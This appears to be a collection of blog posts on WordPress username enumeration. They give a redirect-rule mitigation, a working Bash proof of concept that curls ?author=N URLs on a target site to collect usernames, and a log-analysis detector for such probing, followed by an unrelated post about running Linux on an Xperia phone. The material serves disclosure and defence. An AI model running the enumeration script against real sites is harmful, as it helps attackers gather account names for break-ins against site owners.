After my last post exploiting username enumeration, I looked deeper and found a simple workaround to patch your blog against this vulnerability until WordPress has something to add to it.
I am currently using a WordPress plugin: Redirections
https://wordpress.org/extend/plugins/redirection/
Open the plugin page, which is found under Tools -> Redirections, and add a new rule with the following settings:
Source URL : ^(.*)/?author=(.*)
Target URL : /
Reg Exp : Yes
Match : URL only
Action : Redirect to URL
Then click Add Redirection.
All done. Just try any URL with ?author=<number>.
That URL will now be redirected back to your main page, effectively nullifying the effect of username enumeration.

Hi All,
We have recently seen the WordPress username enumeration vulnerability disclosed here: http://seclists.org/fulldisclosure/2011/May/493
Versions affected are: 2.6, 3.1, 3.1.1, 3.1.3
Here I am enclosing a simple PoC that can be run in a Bash shell.
(Note: a PoC in Python is already available for those who are curious.)
#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
if [ $# -ne 1 ]
then
    echo "Wordpress username enumeration PoC"
    echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
    echo $0 "URL of Website"
else
    count=0
    title=0
    while [ $count -lt 10 ]
    do
        result=`curl -I -s --max-time 30 --max-filesize 1 $1?author=$count | grep -F 'Location:'`
        name=`echo $result | rev | cut -f2 -d"/" | rev`
        nm=`echo "$"$result`
        if [ "$nm" != "$" ]
        then
            if [ $title == 0 ]
            then
                echo "ID : UserName"
                title=1
            fi
            echo -n $count " : "
            echo $name
        fi
        count=`expr $count + 1`
    done
    if [ $title == 0 ]
    then
        echo "Either this site is not vulnerable or is not using wordpress hosted"
    fi
fi
The code can be downloaded from here: wp_PoC_user_name_enum
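
The PoC above requests ?author=0 through ?author=9 from a single client, which leaves a recognisable run of entries in the web server's access log. The following is an added example, not part of the original post, that flags clients requesting many distinct author IDs; the log lines, the "combined" log format and the threshold of 5 are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = '''\
203.0.113.7 - - [01/Jun/2011:10:00:01 +0000] "HEAD /?author=0 HTTP/1.1" 200 0 "-" "curl/7.21.0"
203.0.113.7 - - [01/Jun/2011:10:00:02 +0000] "HEAD /?author=1 HTTP/1.1" 301 0 "-" "curl/7.21.0"
203.0.113.7 - - [01/Jun/2011:10:00:03 +0000] "HEAD /?author=2 HTTP/1.1" 301 0 "-" "curl/7.21.0"
203.0.113.7 - - [01/Jun/2011:10:00:04 +0000] "HEAD /?author=3 HTTP/1.1" 301 0 "-" "curl/7.21.0"
203.0.113.7 - - [01/Jun/2011:10:00:05 +0000] "HEAD /?author=4 HTTP/1.1" 301 0 "-" "curl/7.21.0"
203.0.113.7 - - [01/Jun/2011:10:00:06 +0000] "HEAD /?author=5 HTTP/1.1" 301 0 "-" "curl/7.21.0"
198.51.100.20 - - [01/Jun/2011:10:03:10 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
192.0.2.9 - - [01/Jun/2011:10:04:00 +0000] "GET /?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

# Assumed threshold: distinct author IDs from one client before it is flagged.
THRESHOLD = 5

# Captures the client IP and the request target from the quoted request line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3} ')


def author_probes(log_text):
    """Map each client IP to the set of numeric author IDs it requested."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get("author", []):
            if re.fullmatch(r"[0-9]+", value):
                seen[ip].add(int(value))
    return seen


def flag_enumeration(log_text, threshold=THRESHOLD):
    """Return {ip: sorted author IDs} for clients at or above the threshold."""
    return {ip: sorted(ids)
            for ip, ids in author_probes(log_text).items()
            if len(ids) >= threshold}


if __name__ == "__main__":
    for ip, ids in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip} requested author IDs {ids}")
```

Redirected requests are still written to the access log, so the same check keeps working after the redirect rule described earlier is in place.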

I have been working on using any Linux distribution on my handset (SE Xperia X10), and I have finally succeeded.
I have posted all the details in a nice manner on the XDA Developers forum and would prefer getting bug reports and suggestions there.
XDA DEVELOPERS Forum : Ubuntu Lucid CHROOT: updated scripts
CLI : command prompt at its best.

GUI on Xperia : LXDE
